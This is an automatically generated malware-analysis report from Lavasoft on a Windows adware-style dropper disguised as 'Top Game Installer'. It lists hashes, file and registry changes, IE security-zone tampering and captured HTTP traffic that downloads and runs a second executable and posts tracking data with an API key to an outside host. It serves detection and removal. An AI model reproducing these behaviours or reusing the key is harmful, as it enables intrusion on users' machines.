Sample_6f2bf1378d

by malwarelabrobot on February 2nd, 2016 in Malware Descriptions.

mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 6f2bf1378dd9762eb931d387c9d82ae2
SHA1: bbf35b8129f83ec69e2cbe781ed97a02496ad882
SHA256: 5bd9a191e6dbb1f10a8be0ef8787d5deaf73e2bcd644c6d0cf874945ca60cbf1
SSDeep: 24576:6i8OH8F37JqsB9n7KkVj9XCwGA6SWa4B:4PJh kV5CQ
Size: 823808 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-01-02 12:03:09
Analyzed on: WindowsXP SP3 32-bit


Summary:

Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

dwwin.exe:1160
drwtsn32.exe:1924
%original file name%.exe:1756
uninstallmodule.exe:596

The Malware injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process dwwin.exe:1160 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HLW8ZUJT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\733A0.dmp (74488 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\E7C18NKY\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OTJDC59Y\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1DWWW7FS\desktop.ini (67 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\733A0.dmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\30b1_appcompat.txt (0 bytes)

The process drwtsn32.exe:1924 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Microsoft\Dr Watson\user.dmp (63379 bytes)
%Documents and Settings%\All Users\Application Data\Microsoft\Dr Watson\drwtsn32.log (102562 bytes)

The process %original file name%.exe:1756 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\uninstallmodule.exe.tmp (117724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_uninsep.bat (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uninstallmodule.exe (6841 bytes)

The process uninstallmodule.exe:596 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\30b1_appcompat.txt (1979 bytes)

The Malware deletes the following file(s):

Registry activity

The process dwwin.exe:1160 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 2D 7D 7F 59 27 3A 40 96 A9 86 50 04 D7 AF 49"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process drwtsn32.exe:1924 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 53 19 18 94 1A AF 7F BD 34 B1 FE AB C2 6C 58"

[HKLM\SOFTWARE\Microsoft\DrWatson]
"NumberOfCrashes" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process %original file name%.exe:1756 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 0F 2B FC E3 76 78 28 83 52 27 62 6E 19 98 77"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"_uninsep.bat" = "_uninsep"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"uninstallmodule.exe" = "uninstallmodule"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Malware modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Malware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Malware modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Malware deletes the following value(s) in system registry:
The Malware disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"IDSCPRODUCT"

The process uninstallmodule.exe:596 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 81 45 A5 55 CC 3F 10 6E 06 59 96 4F 20 5B EC"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"

Dropped PE files

MD5 File path
ea8c1b5d9f7b766e04ff296758ae02db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\uninstallmodule.exe
ea8c1b5d9f7b766e04ff296758ae02db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\uninstallmodule.exe.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Top Game Installer
Product Name: Top Game Installer
Product Version: 1.0
Legal Copyright: Top Game Installer
Legal Trademarks:
Original Filename: Top Game Installer.exe
Internal Name: Top Game Installer
File Version: 1.0
File Description: Top Game Installer
Comments:
Language: English (United States)

PE Sections

Name     Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
.text    4096             702060        702464    4.26697   7ad9425b8d1e50facb00531d536416c2
.data    708608           23332         23552     0.100838  b07224b3acd84b8b6e0fc450410d300f
.rdata   733184           62252         62464     3.8741    309dbdd93f7e20d17813b9619c24a4b9
.bss     798720           4096          0         0         d41d8cd98f00b204e9800998ecf8427e
.edata   802816           1602          2048      3.09246   f776cbf04fb9013797817e1ec3e1e355
.idata   806912           6224          6656      3.55701   8d96631479e9195377a207719f07d8fc
.CRT     815104           56            512       0.221488  94975933fb719c11f3a8757e452a06ce
.tls     819200           32            512       0.14174   b94bb441a067f954ca855273080a7f2c
.rsrc    823296           856           1024      1.8821    1a990b6f248f4cf9ed3f54d7b877969d
.reloc   827392           23424         23552     4.62335   79b8b80eed08886fb3685a3beee73b79

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{ 151.80.19.137
hxxp://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe 151.80.21.42
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_download_succeed 151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_execute_succeed 151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_download_start 151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_start 151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_end 151.80.19.137
www.wizzmonetize.com 149.202.85.170


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

POST /csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_end HTTP/1.1
Host: agent.wizztrakys.com
Accept: */*
Content-Length: 59
Content-Type: application/x-www-form-urlencoded

user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:16 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=cj12c3drql6dd1fbn72md4of34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..


POST /csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_execute_succeed HTTP/1.1
Host: agent.wizztrakys.com
Accept: */*
Content-Length: 59
Content-Type: application/x-www-form-urlencoded

user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:16 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=6ebfgo5m52mc1i8f1btginfai1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..


POST /csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_start HTTP/1.1
Host: agent.wizztrakys.com
Accept: */*
Content-Length: 59
Content-Type: application/x-www-form-urlencoded

user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:12 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=9pj0telk0geot1e0qgookut5o3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..


POST /csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_download_succeed HTTP/1.1
Host: agent.wizztrakys.com
Accept: */*
Content-Length: 59
Content-Type: application/x-www-form-urlencoded

user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:16 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=puamqss5sataeme8sfh85fsf90; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..


POST /csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_download_start HTTP/1.1
Host: agent.wizztrakys.com
Accept: */*
Content-Length: 59
Content-Type: application/x-www-form-urlencoded

user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:13 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=8ii2bcgrd4mk4u282k0o9fp0k4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..


GET /download/1/wizzuninstallmodule.exe HTTP/1.1
Host: dl.wizzuniquify.com
Accept: */*


HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:13 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=eyJpdiI6ImJBak03ajRMXC9UeVJnKzR3ZUNFeEZnPT0iLCJ2YWx1ZSI6IkNaeEh6VGNlcU5kOUFkdW1ibnBoRFdadEtUa3FEK3diQ2k3WDI0SDZKeEtMWXh4aXk4emJodHB2WjhlSVM5ZisrVGMwUGcwdm1uT3hETU05dVR1V0ZBPT0iLCJtYWMiOiJkNjY3NzM4NmY2N2RhMTVjMTEzN2E5NTgxMzA1NWVjZThmZjQxMDI2M2IyNmE3ZDEzYWRjNTAwZWZjYWFiNWQ2In0=; expires=Mon, 01-Feb-2016 17:35:15 GMT; Max-Age=7200; path=/; httponly
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

The Malware connects to the servers at the following location(s):

Strings from Dumps were not found.


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    dwwin.exe:1160
    drwtsn32.exe:1924
    %original file name%.exe:1756
    uninstallmodule.exe:596

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HLW8ZUJT\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\733A0.dmp (74488 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\E7C18NKY\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OTJDC59Y\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1DWWW7FS\desktop.ini (67 bytes)
    %Documents and Settings%\All Users\Application Data\Microsoft\Dr Watson\user.dmp (63379 bytes)
    %Documents and Settings%\All Users\Application Data\Microsoft\Dr Watson\drwtsn32.log (102562 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\uninstallmodule.exe.tmp (117724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_uninsep.bat (180 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\30b1_appcompat.txt (1979 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
